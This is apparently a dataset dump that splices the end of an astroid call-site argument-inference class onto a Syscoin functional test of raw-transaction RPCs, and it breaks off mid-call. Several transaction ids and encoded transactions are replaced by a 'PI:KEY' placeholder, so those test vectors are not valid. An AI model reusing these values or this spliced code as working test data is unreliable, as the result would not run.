len(self._unpacked_kwargs)\n\n def _unpack_keywords(self, keywords, context=None):\n values = {}\n context = context or contextmod.InferenceContext()\n context.extra_context = self.argument_context_map\n for name, value in keywords:\n if name is None:\n # Then it\'s an unpacking operation (**)\n try:\n inferred = next(value.infer(context=context))\n except exceptions.InferenceError:\n values[name] = util.Uninferable\n continue\n\n if not isinstance(inferred, nodes.Dict):\n # Not something we can work with.\n values[name] = util.Uninferable\n continue\n\n for dict_key, dict_value in inferred.items:\n try:\n dict_key = next(dict_key.infer(context=context))\n except exceptions.InferenceError:\n values[name] = util.Uninferable\n continue\n if not isinstance(dict_key, nodes.Const):\n values[name] = util.Uninferable\n continue\n if not isinstance(dict_key.value, str):\n values[name] = util.Uninferable\n continue\n if dict_key.value in values:\n # The name is already in the dictionary\n values[dict_key.value] = util.Uninferable\n self.duplicated_keywords.add(dict_key.value)\n continue\n values[dict_key.value] = dict_value\n else:\n values[name] = value\n return values\n\n def _unpack_args(self, args, context=None):\n values = []\n context = context or contextmod.InferenceContext()\n context.extra_context = self.argument_context_map\n for arg in args:\n if isinstance(arg, nodes.Starred):\n try:\n inferred = next(arg.value.infer(context=context))\n except exceptions.InferenceError:\n values.append(util.Uninferable)\n continue\n\n if inferred is util.Uninferable:\n values.append(util.Uninferable)\n continue\n if not hasattr(inferred, ""elts""):\n values.append(util.Uninferable)\n continue\n values.extend(inferred.elts)\n else:\n values.append(arg)\n return values\n\n def infer_argument(self, funcnode, name, context):\n """"""infer a function argument value according to the call context\n\n Arguments:\n funcnode: The function being called.\n name: The name of the argument whose value is being inferred.\n context: Inference context object\n """"""\n if name in self.duplicated_keywords:\n raise exceptions.InferenceError(\n ""The arguments passed to {func!r} "" "" have duplicate keywords."",\n call_site=self,\n func=funcnode,\n arg=name,\n context=context,\n )\n\n # Look into the keywords first, maybe it\'s already there.\n try:\n return self.keyword_arguments[name].infer(context)\n except KeyError:\n pass\n\n # Too many arguments given and no variable arguments.\n if len(self.positional_arguments) > len(funcnode.args.args):\n if not funcnode.args.vararg and not funcnode.args.posonlyargs:\n raise exceptions.InferenceError(\n ""Too many positional arguments ""\n ""passed to {func!r} that does ""\n ""not have *args."",\n call_site=self,\n func=funcnode,\n arg=name,\n context=context,\n )\n\n positional = self.positional_arguments[: len(funcnode.args.args)]\n vararg = self.positional_arguments[len(funcnode.args.args) :]\n argindex = funcnode.args.find_argname(name)[0]\n kwonlyargs = {arg.name for arg in funcnode.args.kwonlyargs}\n kwargs = {\n key: value\n for key, value in self.keyword_arguments.items()\n if key not in kwonlyargs\n }\n # If there are too few positionals compared to\n # what the function expects to receive, check to see\n # if the missing positional arguments were passed\n # as keyword arguments and if so, place them into the\n # positional args list.\n if len(positional) < len(funcnode.args.args):\n for func_arg in funcnode.args.args:\n if func_arg.name in kwargs:\n arg = kwargs.pop(func_arg.name)\n positional.append(arg)\n\n if argindex is not None:\n # 2. first argument of instance/class method\n if argindex == 0 and funcnode.type in (""method"", ""classmethod""):\n if context.boundnode is not None:\n boundnode = context.boundnode\n else:\n # XXX can do better ?\n boundnode = funcnode.parent.frame()\n\n if isinstance(boundnode, nodes.ClassDef):\n # Verify that we\'re accessing a method\n # of the metaclass through a class, as in\n # `cls.metaclass_method`. In this case, the\n # first argument is always the class.\n method_scope = funcnode.parent.scope()\n if method_scope is boundnode.metaclass():\n return iter((boundnode,))\n\n if funcnode.type == ""method"":\n if not isinstance(boundnode, bases.Instance):\n boundnode = boundnode.instantiate_class()\n return iter((boundnode,))\n if funcnode.type == ""classmethod"":\n return iter((boundnode,))\n # if we have a method, extract one position\n # from the index, so we\'ll take in account\n # the extra parameter represented by `self` or `cls`\n if funcnode.type in (""method"", ""classmethod""):\n argindex -= 1\n # 2. search arg index\n try:\n return self.positional_arguments[argindex].infer(context)\n except IndexError:\n pass\n\n if funcnode.args.kwarg == name:\n # It wants all the keywords that were passed into\n # the call site.\n if self.has_invalid_keywords():\n raise exceptions.InferenceError(\n ""Inference failed to find values for all keyword arguments ""\n ""to {func!r}: {unpacked_kwargs!r} doesn\'t correspond to ""\n ""{keyword_arguments!r}."",\n keyword_arguments=self.keyword_arguments,\n unpacked_kwargs=self._unpacked_kwargs,\n call_site=self,\n func=funcnode,\n arg=name,\n context=context,\n )\n kwarg = nodes.Dict(\n lineno=funcnode.args.lineno,\n col_offset=funcnode.args.col_offset,\n parent=funcnode.args,\n )\n kwarg.postinit(\n [(nodes.const_factory(key), value) for key, value in kwargs.items()]\n )\n return iter((kwarg,))\n if funcnode.args.vararg == name:\n # It wants all the args that were passed into\n # the call site.\n if self.has_invalid_arguments():\n raise exceptions.InferenceError(\n ""Inference failed to find values for all positional ""\n ""arguments to {func!r}: {unpacked_args!r} doesn\'t ""\n ""correspond to {positional_arguments!r}."",\n positional_arguments=self.positional_arguments,\n unpacked_args=self._unpacked_args,\n call_site=self,\n func=funcnode,\n arg=name,\n context=context,\n )\n args = nodes.Tuple(\n lineno=funcnode.args.lineno,\n col_offset=funcnode.args.col_offset,\n parent=funcnode.args,\n )\n args.postinit(vararg)\n return iter((args,))\n\n # Check if it\'s a default parameter.\n try:\n return funcnode.args.default_value(name).infer(context)\n except exceptions.NoDefault:\n pass\n raise exceptions.InferenceError(\n ""No value found for argument {arg} to {func!r}"",\n call_site=self,\n func=funcnode,\n arg=name,\n context=context,\n )\n', '#!/usr/bin/env python3\n# Copyright (c) 2014-2020 The Bitcoin Core developers\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n""""""Test the rawtransaction RPCs.\n\nTest the following RPCs:\n - createrawtransaction\n - signrawtransactionwithwallet\n - sendrawtransaction\n - decoderawtransaction\n - getrawtransaction\n""""""\n\nfrom collections import OrderedDict\nfrom decimal import Decimal\nfrom io import BytesIO\nfrom test_framework.messages import CTransaction, ToHex\nfrom test_framework.test_framework import SyscoinTestFramework\nfrom test_framework.util import (\n assert_equal,\n assert_raises_rpc_error,\n find_vout_for_address,\n hex_str_to_bytes,\n)\n\n\nclass multidict(dict):\n """"""Dictionary that allows duplicate keys.\n\n Constructed with a list of (key, value) tuples. When dumped by the json module,\n will output invalid json with repeated keys, eg:\n >>> json.dumps(multidict([(1,2),(1,2)])\n \'{""1"": 2, ""1"": 2}\'\n\n Used to test calls to rpc methods with repeated keys in the json object.""""""\n\n def __init__(self, x):\n dict.__init__(self, x)\n self.x = x\n\n def items(self):\n return self.x\n\n\n# Create one-input, one-output, no-fee transaction:\nclass RawTransactionsTest(SyscoinTestFramework):\n def set_test_params(self):\n self.setup_clean_chain = True\n self.num_nodes = 3\n self.extra_args = [\n [""-txindex""],\n [""-txindex""],\n [""-txindex""],\n ]\n self.supports_cli = False\n\n def skip_test_if_missing_module(self):\n self.skip_if_no_wallet()\n\n def setup_network(self):\n super().setup_network()\n self.connect_nodes(0, 2)\n\n def run_test(self):\n self.log.info(\'prepare some coins for multiple *rawtransaction commands\')\n self.nodes[2].generate(1)\n self.sync_all()\n self.nodes[0].generate(101)\n self.sync_all()\n self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.5)\n self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.0)\n self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),5.0)\n self.sync_all()\n self.nodes[0].generate(5)\n self.sync_all()\n\n self.log.info(\'Test getrawtransaction on genesis block coinbase returns an error\')\n block = self.nodes[0].getblock(self.nodes[0].getblockhash(0))\n assert_raises_rpc_error(-5, ""The genesis block coinbase is not considered an ordinary transaction"", self.nodes[0].getrawtransaction, block[\'merkleroot\'])\n\n self.log.info(\'Check parameter types and required parameters of createrawtransaction\')\n # Test `createrawtransaction` required parameters\n assert_raises_rpc_error(-1, ""createrawtransaction"", self.nodes[0].createrawtransaction)\n assert_raises_rpc_error(-1, ""createrawtransaction"", self.nodes[0].createrawtransaction, [])\n\n # Test `createrawtransaction` invalid extra parameters\n assert_raises_rpc_error(-1, ""createrawtransaction"", self.nodes[0].createrawtransaction, [], {}, 0, False, \'foo\')\n\n # Test `createrawtransaction` invalid `inputs`\n txid = \'PI:KEY\'\n assert_raises_rpc_error(-3, ""Expected type array"", self.nodes[0].createrawtransaction, \'foo\', {})\n assert_raises_rpc_error(-1, ""JSON value is not an object as expected"", self.nodes[0].createrawtransaction, [\'foo\'], {})\n assert_raises_rpc_error(-1, ""JSON value is not a string as expected"", self.nodes[0].createrawtransaction, [{}], {})\n assert_raises_rpc_error(-8, ""txid must be of length 64 (not 3, for \'foo\')"", self.nodes[0].createrawtransaction, [{\'txid\': \'foo\'}], {})\n assert_raises_rpc_error(-8, ""txid must be hexadecimal string (not \'PI:KEY\')"", self.nodes[0].createrawtransaction, [{\'txid\': \'PI:KEY\'}], {})\n assert_raises_rpc_error(-8, ""Invalid parameter, missing vout key"", self.nodes[0].createrawtransaction, [{\'txid\': txid}], {})\n assert_raises_rpc_error(-8, ""Invalid parameter, missing vout key"", self.nodes[0].createrawtransaction, [{\'txid\': txid, \'vout\': \'foo\'}], {})\n assert_raises_rpc_error(-8, ""Invalid parameter, vout cannot be negative"", self.nodes[0].createrawtransaction, [{\'txid\': txid, \'vout\': -1}], {})\n assert_raises_rpc_error(-8, ""Invalid parameter, sequence number is out of range"", self.nodes[0].createrawtransaction, [{\'txid\': txid, \'vout\': 0, \'sequence\': -1}], {})\n\n # Test `createrawtransaction` invalid `outputs`\n address = self.nodes[0].getnewaddress()\n address2 = self.nodes[0].getnewaddress()\n assert_raises_rpc_error(-1, ""JSON value is not an array as expected"", self.nodes[0].createrawtransaction, [], \'foo\')\n self.nodes[0].createrawtransaction(inputs=[], outputs={}) # Should not throw for backwards compatibility\n self.nodes[0].createrawtransaction(inputs=[], outputs=[])\n assert_raises_rpc_error(-8, ""Data must be hexadecimal string"", self.nodes[0].createrawtransaction, [], {\'data\': \'foo\'})\n assert_raises_rpc_error(-5, ""Invalid Syscoin address"", self.nodes[0].createrawtransaction, [], {\'foo\': 0})\n assert_raises_rpc_error(-3, ""Invalid amount"", self.nodes[0].createrawtransaction, [], {address: \'foo\'})\n assert_raises_rpc_error(-3, ""Amount out of range"", self.nodes[0].createrawtransaction, [], {address: -1})\n assert_raises_rpc_error(-8, ""Invalid parameter, duplicated address: %s"" % address, self.nodes[0].createrawtransaction, [], multidict([(address, 1), (address, 1)]))\n assert_raises_rpc_error(-8, ""Invalid parameter, duplicated address: %s"" % address, self.nodes[0].createrawtransaction, [], [{address: 1}, {address: 1}])\n assert_raises_rpc_error(-8, ""Invalid parameter, duplicate key: data"", self.nodes[0].createrawtransaction, [], [{""data"": \'aa\'}, {""data"": ""bb""}])\n assert_raises_rpc_error(-8, ""Invalid parameter, duplicate key: data"", self.nodes[0].createrawtransaction, [], multidict([(""data"", \'aa\'), (""data"", ""bb"")]))\n assert_raises_rpc_error(-8, ""Invalid parameter, key-value pair must contain exactly one key"", self.nodes[0].createrawtransaction, [], [{\'a\': 1, \'b\': 2}])\n assert_raises_rpc_error(-8, ""Invalid parameter, key-value pair not an object as expected"", self.nodes[0].createrawtransaction, [], [[\'key-value pair1\'], [\'2\']])\n\n # Test `createrawtransaction` invalid `locktime`\n assert_raises_rpc_error(-3, ""Expected type number"", self.nodes[0].createrawtransaction, [], {}, \'foo\')\n assert_raises_rpc_error(-8, ""Invalid parameter, locktime out of range"", self.nodes[0].createrawtransaction, [], {}, -1)\n assert_raises_rpc_error(-8, ""Invalid parameter, locktime out of range"", self.nodes[0].createrawtransaction, [], {}, 4294967296)\n\n # Test `createrawtransaction` invalid `replaceable`\n assert_raises_rpc_error(-3, ""Expected type bool"", self.nodes[0].createrawtransaction, [], {}, 0, \'foo\')\n\n self.log.info(\'Check that createrawtransaction accepts an array and object as outputs\')\n tx = CTransaction()\n # One output\n tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{\'txid\': txid, \'vout\': 9}], outputs={address: 99}))))\n assert_equal(len(tx.vout), 1)\n assert_equal(\n tx.serialize().hex(),\n self.nodes[2].createrawtransaction(inputs=[{\'txid\': txid, \'vout\': 9}], outputs=[{address: 99}]),\n )\n # Two outputs\n tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{\'txid\': txid, \'vout\': 9}], outputs=OrderedDict([(address, 99), (address2, 99)])))))\n assert_equal(len(tx.vout), 2)\n assert_equal(\n tx.serialize().hex(),\n self.nodes[2].createrawtransaction(inputs=[{\'txid\': txid, \'vout\': 9}], outputs=[{address: 99}, {address2: 99}]),\n )\n # Multiple mixed outputs\n tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{\'txid\': txid, \'vout\': 9}], outputs=multidict([(address, 99), (address2, 99), (\'data\', \'99\')])))))\n assert_equal(len(tx.vout), 3)\n assert_equal(\n tx.serialize().hex(),\n self.nodes[2].createrawtransaction(inputs=[{\'txid\': txid, \'vout\': 9}], outputs=[{address: 99}, {address2: 99}, {\'data\': \'99\'}]),\n )\n\n for type in [""bech32"", ""p2sh-segwit"", ""legacy""]:\n addr = self.nodes[0].getnewaddress("""", type)\n addrinfo = self.nodes[0].getaddressinfo(addr)\n pubkey = addrinfo[""scriptPubKey""]\n\n self.log.info(\'sendrawtransaction with missing prevtx info (%s)\' %(type))\n\n # Test `signrawtransactionwithwallet` invalid `prevtxs`\n inputs = [ {\'txid\' : txid, \'vout\' : 3, \'sequence\' : 1000}]\n outputs = { self.nodes[0].getnewaddress() : 1 }\n rawtx = self.nodes[0].createrawtransaction(inputs, outputs)\n\n prevtx = dict(txid=txid, scriptPubKey=pubkey, vout=3, amount=1)\n succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])\n assert succ[""complete""]\n if type == ""legacy"":\n del prevtx[""amount""]\n succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])\n assert succ[""complete""]\n\n if type != ""legacy"":\n assert_raises_rpc_error(-3, ""Missing amount"", self.nodes[0].signrawtransactionwithwallet, rawtx, [\n {\n ""txid"": txid,\n ""scriptPubKey"": pubkey,\n ""vout"": 3,\n }\n ])\n\n assert_raises_rpc_error(-3, ""Missing vout"", self.nodes[0].signrawtransactionwithwallet, rawtx, [\n {\n ""txid"": txid,\n ""scriptPubKey"": pubkey,\n ""amount"": 1,\n }\n ])\n assert_raises_rpc_error(-3, ""Missing txid"", self.nodes[0].signrawtransactionwithwallet, rawtx, [\n {\n ""scriptPubKey"": pubkey,\n ""vout"": 3,\n ""amount"": 1,\n }\n ])\n assert_raises_rpc_error(-3, ""Missing scriptPubKey"", self.nodes[0].signrawtransactionwithwallet, rawtx, [\n {\n ""txid"": txid,\n ""vout"": 3,\n ""amount"": 1\n }\n ])\n\n #########################################\n # sendrawtransaction with missing input #\n #########################################\n\n self.log.info(\'sendrawtransaction with missing input\')\n inputs = [ {\'txid\' : ""PI:KEY"", \'vout\' : 1}] #won\'t exists\n outputs = { self.nodes[0].getnewaddress() : 4.998 }\n rawtx = self.nodes[2].createrawtransaction(inputs, outputs)\n rawtx = self.nodes[2].signrawtransactionwithwallet(rawtx)\n\n # This will raise an exception since there are missing inputs\n assert_raises_rpc_error(-25, ""bad-txns-inputs-missingorspent"", self.nodes[2].sendrawtransaction, rawtx[\'hex\'])\n\n #####################################\n # getrawtransaction with block hash #\n #####################################\n\n # make a tx by sending then generate 2 blocks; block1 has the tx in it\n tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress(), 1)\n block1, block2 = self.nodes[2].generate(2)\n self.sync_all()\n # We should be able to get the raw transaction by providing the correct block\n gottx = self.nodes[0].getrawtransaction(tx, True, block1)\n assert_equal(gottx[\'txid\'], tx)\n assert_equal(gottx[\'in_active_chain\'], True)\n # We should have the \'in_active_chain\' flag when we don\'t provide a block due to blockindexdb\n gottx = self.nodes[0].getrawtransaction(tx, True)\n assert_equal(gottx[\'txid\'], tx)\n # SYSCOIN\n assert \'in_active_chain\' in gottx\n # We should not get the tx if we provide an unrelated block\n assert_raises_rpc_error(-5, ""No such transaction found"", self.nodes[0].getrawtransaction, tx, True, block2)\n # An invalid block hash should raise the correct errors\n assert_raises_rpc_error(-1, ""JSON value is not a string as expected"", self.nodes[0].getrawtransaction, tx, True, True)\n assert_raises_rpc_error(-8, ""parameter 3 must be of length 64 (not 6, for \'foobar\')"", self.nodes[0].getrawtransaction, tx, True, ""foobar"")\n assert_raises_rpc_error(-8, ""parameter 3 must be of length 64 (not 8, for \'abcd1234\')"", self.nodes[0].getrawtransaction, tx, True, ""abcd1234"")\n assert_raises_rpc_error(-8, ""parameter 3 must be hexadecimal string (not \'ZZZ0000000000000000000000000000000000000000000000000000000000000\')"", self.nodes[0].getrawtransaction, tx, True, ""ZZZ0000000000000000000000000000000000000000000000000000000000000"")\n assert_raises_rpc_error(-5, ""Block hash not found"", self.nodes[0].getrawtransaction, tx, True, ""0000000000000000000000000000000000000000000000000000000000000000"")\n # Undo the blocks and check in_active_chain\n self.nodes[0].invalidateblock(block1)\n gottx = self.nodes[0].getrawtransaction(txid=tx, verbose=True, blockhash=block1)\n assert_equal(gottx[\'in_active_chain\'], False)\n self.nodes[0].reconsiderblock(block1)\n assert_equal(self.nodes[0].getbestblockhash(), block2)\n\n if not self.options.descriptors:\n # The traditional multisig workflow does not work with descriptor wallets so these are legacy only.\n # The multisig workflow with descriptor wallets uses PSBTs and is tested elsewhere, no need to do them here.\n #########################\n # RAW TX MULTISIG TESTS #\n #########################\n # 2of2 test\n addr1 = self.nodes[2].getnewaddress()\n addr2 = self.nodes[2].getnewaddress()\n\n addr1Obj = self.nodes[2].getaddressinfo(addr1)\n addr2Obj = self.nodes[2].getaddressinfo(addr2)\n\n # Tests for createmultisig and addmultisigaddress\n assert_raises_rpc_error(-5, ""Invalid public key"", self.nodes[0].createmultisig, 1, [""01020304""])\n self.nodes[0].createmultisig(2, [addr1Obj[\'pubkey\'], addr2Obj[\'pubkey\']]) # createmultisig can only take public keys\n assert_raises_rpc_error(-5, ""Invalid public key"", self.nodes[0].createmultisig, 2, [addr1Obj[\'pubkey\'], addr1]) # addmultisigaddress can take both pubkeys and addresses so long as they are in the wallet, which is tested here.\n\n mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj[\'pubkey\'], addr1])[\'address\']\n\n #use balance deltas instead of absolute values\n bal = self.nodes[2].getbalance()\n\n # send 1.2 SYS to msig adr\n txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)\n self.sync_all()\n self.nodes[0].generate(1)\n self.sync_all()\n assert_equal(self.nodes[2].getbalance(), bal+Decimal(\'1.20000000\')) #node2 has both keys of the 2of2 ms addr., tx should affect the balance\n\n\n # 2of3 test from different nodes\n bal = self.nodes[2].getbalance()\n addr1 = self.nodes[1].getnewaddress()\n addr2 = self.nodes[2].getnewaddress()\n addr3 = self.nodes[2].getnewaddress()\n\n addr1Obj = self.nodes[1].getaddressinfo(addr1)\n addr2Obj = self.nodes[2].getaddressinfo(addr2)\n addr3Obj = self.nodes[2].getaddressinfo(addr3)\n\n mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj[\'pubkey\'], addr2Obj[\'pubkey\'], addr3Obj[\'pubkey\']])[\'address\']\n\n txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)\n decTx = self.nodes[0].gettransaction(txId)\n rawTx = self.nodes[0].decoderawtransaction(decTx[\'hex\'])\n self.sync_all()\n self.nodes[0].generate(1)\n self.sync_all()\n\n #THIS IS AN INCOMPLETE FEATURE\n #NODE2 HAS TWO OF THREE KEY AND THE FUNDS SHOULD BE SPENDABLE AND COUNT AT BALANCE CALCULATION\n assert_equal(self.nodes[2].getbalance(), bal) #for now, assume the funds of a 2of3 multisig tx are not marked as spendable\n\n txDetails = self.nodes[0].gettransaction(txId, True)\n rawTx = self.nodes[0].decoderawtransaction(txDetails[\'hex\'])\n vout = next(o for o in rawTx[\'vout\'] if o[\'value\'] == Decimal(\'2.20000000\'))\n\n bal = self.nodes[0].getbalance()\n inputs = [{ ""txid"" : txId, ""vout"" : vout[\'n\'], ""scriptPubKey"" : vout[\'scriptPubKey\'][\'hex\'], ""amount"" : vout[\'value\']}]\n outputs = { self.nodes[0].getnewaddress() : 2.19 }\n rawTx = self.nodes[2].createrawtransaction(inputs, outputs)\n rawTxPartialSigned = self.nodes[1].signrawtransactionwithwallet(rawTx, inputs)\n assert_equal(rawTxPartialSigned[\'complete\'], False) #node1 only has one key, can\'t comp. sign the tx\n\n rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx, inputs)\n assert_equal(rawTxSigned[\'complete\'], True) #node2 can sign the tx compl., own two of three keys\n self.nodes[2].sendrawtransaction(rawTxSigned[\'hex\'])\n rawTx = self.nodes[0].decoderawtransaction(rawTxSigned[\'hex\'])\n self.sync_all()\n self.nodes[0].generate(1)\n self.sync_all()\n assert_equal(self.nodes[0].getbalance(), bal+Decimal(\'50.00000000\')+Decimal(\'2.19000000\')) #block reward + tx\n\n # 2of2 test for combining transactions\n bal = self.nodes[2].getbalance()\n addr1 = self.nodes[1].getnewaddress()\n addr2 = self.nodes[2].getnewaddress()\n\n addr1Obj = self.nodes[1].getaddressinfo(addr1)\n addr2Obj = self.nodes[2].getaddressinfo(addr2)\n\n self.nodes[1].addmultisigaddress(2, [addr1Obj[\'pubkey\'], addr2Obj[\'pubkey\']])[\'address\']\n mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj[\'pubkey\'], addr2Obj[\'pubkey\']])[\'address\']\n mSigObjValid = self.nodes[2].getaddressinfo(mSigObj)\n\n txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)\n decTx = self.nodes[0].gettransaction(txId)\n rawTx2 = self.nodes[0].decoderawtransaction(decTx[\'hex\'])\n self.sync_all()\n self.nodes[0].generate(1)\n self.sync_all()\n\n assert_equal(self.nodes[2].getbalance(), bal) # the funds of a 2of2 multisig tx should not be marked as spendable\n\n txDetails = self.nodes[0].gettransaction(txId, True)\n rawTx2 = self.nodes[0].decoderawtransaction(txDetails[\'hex\'])\n vout = next(o for o in rawTx2[\'vout\'] if o[\'value\'] == Decimal(\'2.20000000\'))\n\n bal = self.nodes[0].getbalance()\n inputs = [{ ""txid"" : txId, ""vout"" : vout[\'n\'], ""scriptPubKey"" : vout[\'scriptPubKey\'][\'hex\'], ""redeemScript"" : mSigObjValid[\'hex\'], ""amount"" : vout[\'value\']}]\n outputs = { self.nodes[0].getnewaddress() : 2.19 }\n rawTx2 = self.nodes[2].createrawtransaction(inputs, outputs)\n rawTxPartialSigned1 = self.nodes[1].signrawtransactionwithwallet(rawTx2, inputs)\n self.log.debug(rawTxPartialSigned1)\n assert_equal(rawTxPartialSigned1[\'complete\'], False) #node1 only has one key, can\'t comp. sign the tx\n\n rawTxPartialSigned2 = self.nodes[2].signrawtransactionwithwallet(rawTx2, inputs)\n self.log.debug(rawTxPartialSigned2)\n assert_equal(rawTxPartialSigned2[\'complete\'], False) #node2 only has one key, can\'t comp. sign the tx\n rawTxComb = self.nodes[2].combinerawtransaction([rawTxPartialSigned1[\'hex\'], rawTxPartialSigned2[\'hex\']])\n self.log.debug(rawTxComb)\n self.nodes[2].sendrawtransaction(rawTxComb)\n rawTx2 = self.nodes[0].decoderawtransaction(rawTxComb)\n self.sync_all()\n self.nodes[0].generate(1)\n self.sync_all()\n assert_equal(self.nodes[0].getbalance(), bal+Decimal(\'50.00000000\')+Decimal(\'2.19000000\')) #block reward + tx\n\n # decoderawtransaction tests\n # witness transaction\n encrawtx = ""PI:KEY""\n decrawtx = self.nodes[0].decoderawtransaction(encrawtx, True) # decode as witness transaction\n assert_equal(decrawtx[\'vout\'][0][\'value\'], Decimal(\'1.00000000\'))\n assert_raises_rpc_error(-22, \'TX decode failed\', self.nodes[0].decoderawtransaction, encrawtx, False) # force decode as non-witness transaction\n # non-witness transaction\n encrawtx = ""PI:KEY""\n decrawtx = self.nodes[0].decoderawtransaction(encrawtx, False) # decode as non-witness transaction\n assert_equal(decrawtx[\'vout\'][0][\'value\'], Decimal(\'1.00000000\'))\n # known ambiguous transaction in the chain (see https://github.com/bitcoin/bitcoin/issues/20579)\n encrawtx = ""PI:KEY""\n decrawtx = self.nodes[0].decoderawtransaction(encrawtx)\n decrawtx_wit = self.nodes[0].decoderawtransaction(encrawtx, True)\n assert_raises_rpc_error(-22, \'TX decode failed\', self.nodes[0].decoderawtransaction, encrawtx, False) # fails to decode as non-witness transaction\n assert_equal(decrawtx, decrawtx_wit) # the witness interpretation should be chosen\n assert_equal(decrawtx[\'vin\'][0][\'coinbase\'], ""PI:KEY"")\n\n # Basic signrawtransaction test\n addr = self.nodes[1].getnewaddress()\n txid = self.nodes[0].sendtoaddress(addr, 10)\n self.nodes[0].generate(1)\n self.sync_all()\n vout = find_vout_for_address(self.nodes[1], txid, addr)\n rawTx = self.nodes[1].createrawtransaction([{\'txid\': txid, \'vout\': vout}], {self.nodes[1].getnewaddress(): 9.999})\n rawTxSigned = self.nodes[1].signrawtransactionwithwallet(rawTx)\n txId = self.nodes[1].sendrawtransaction(rawTxSigned[\'hex\'])\n self.nodes[0].generate(1)\n self.sync_all()\n\n # getrawtransaction tests\n # 1. valid parameters - only supply txid\n assert_equal(self.nodes[0].getrawtransaction(txId), rawTxSigned[\'hex\'])\n\n # 2. valid parameters - supply txid and 0 for non-verbose\n assert_equal(self.nodes[0].getrawtransaction(txId, 0), rawTxSigned[\'hex\'])\n\n # 3. valid parameters - supply txid and False for non-verbose\n assert_equal(self.nodes[0].getrawtransaction(txId, False), rawTxSigned[\'hex\'])\n\n # 4. valid parameters - supply txid and 1 for verbose.\n # We only check the ""hex"" field of the output so we don\'t need to update this test every time the output format changes.\n assert_equal(self.nodes[0].getrawtransaction(txId, 1)[""hex""], rawTxSigned[\'hex\'])\n\n # 5. valid parameters - supply txid and True for non-verbose\n assert_equal(self.nodes[0].getrawtransaction(txId, True)[""hex""], rawTxSigned[\'hex\'])\n\n # 6. invalid parameters - supply txid and string ""Flase""\n assert_raises_rpc_error(-1, ""not a boolean"", self.nodes[0].getrawtransaction, txId, ""Flase"")\n\n # 7. invalid parameters - supply txid and empty array\n assert_raises_rpc_error(-1, ""not a boolean"", self.nodes[0].getrawtransaction, txId, [])\n\n # 8. invalid parameters - supply txid and empty dict\n assert_raises_rpc_error(-1, ""not a boolean"", self.nodes[0].getrawtransaction, txId, {})\n\n inputs = [ {\'txid\' : ""PI:KEY"", \'vout\' : 1, \'sequence\' : 1000}]\n outputs = { self.nodes[0].getnewaddress() : 1 }\n rawtx = self.nodes[0].createrawtransaction(inputs, outputs)\n decrawtx= self.nodes[0].decoderawtransaction(rawtx)\n assert_equal(decrawtx[\'vin\'][0][\'sequence\'], 1000)\n\n # 9. invalid parameters - sequence number out of range\n inputs = [ {\'txid\' : ""PI:KEY"", \'vout\' : 1, \'sequence\' : -1}]\n outputs = { self.nodes[0].getnewaddress() : 1 }\n assert_raises_rpc_error(-8, \'Invalid parameter, sequence number is out of range\', self.nodes[0].createrawtransaction, inputs, outputs)\n\n # 10. invalid parameters - sequence number out of range\n inputs = [ {\'txid\' : ""PI:KEY"", \'vout\' : 1, \'sequence\' : 4294967296}]\n outputs = { self.nodes[0].getnewaddress() : 1 }\n assert_raises_rpc_error(-8, \'Invalid parameter, sequence number is out of range\', self.nodes[0].createrawtransaction, inputs, outputs)\n\n inputs = [ {\'txid\' : ""PI:KEY"", \'vout\' : 1, \'sequence\' : 4294967294}]\n outputs = { self.nodes[0].getnewaddress() : 1 }\n rawtx = self.nodes[0].createrawtransaction(inputs, outputs)\n decrawtx= self.nodes[0].decoderawtransaction(rawtx)\n assert_equal(decrawtx[\'vin\'][0][\'sequence\'], 4294967294)\n\n ####################################\n # TRANSACTION VERSION NUMBER TESTS #\n ####################################\n\n # Test the minimum transaction version number that fits in a signed 32-bit integer.\n # As transaction version is unsigned, this should convert to its unsigned equivalent.\n tx = CTransaction()\n tx.nVersion = -0x80000000\n rawtx = ToHex(tx)\n decrawtx = self.nodes[0].decoderawtransaction(rawtx)\n assert_equal(decrawtx[\'version\'], 0x80000000)\n\n # Test the maximum transaction version number that fits in a signed 32-bit integer.\n tx = CTransaction()\n tx.nVersion = 0x7fffffff\n rawtx = ToHex(tx)\n decrawtx = self.nodes[0].decoderawtransaction(rawtx)\n assert_equal(decrawtx[\'version\'], 0x7fffffff)\n\n self.log.info(\'sendrawtransaction/testmempoolaccept with maxfeerate\')\n\n # Test a transaction with a small fee.\n txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)\n rawTx = self.nodes[0].getrawtransaction(txId, True)\n vout = next(o for o in rawTx[\'vout\'] if o[\'value\'] == Decimal(\'1.00000000\'))\n\n self.sync_all()\n inputs = [{ ""txid"" : txId, ""vout"" : vout[\'n\'] }]\n # Fee 10,000 satoshis, (1 - (10000 sat * 0.00000001 SYS/sat)) = 0.9999\n outputs = { self.nodes[0].getnewaddress() : Decimal(""0.99990000"") }\n rawTx = self.nodes[2].createrawtransaction(inputs, outputs)\n rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)\n assert_equal(rawTxSigned[\'complete\'], True)\n # Fee 10,000 satoshis, ~100 b transaction, fee rate should land around 100 sat/byte = 0.00100000 SYS/kB\n # Thus, testmempoolaccept should reject\n testres = self.nodes[2].testmempoolaccept([rawTxSigned[\'hex\']], 0.00001000)[0]\n assert_equal(testres[\'allowed\'], False)\n assert_equal(testres[\'reject-reason\'], \'max-fee-exceeded\')\n # and sendrawtransaction should throw\n assert_raises_rpc_error(-25, \'Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)\', self.nodes[2].sendrawtransaction, rawTxSigned[\'hex\'], 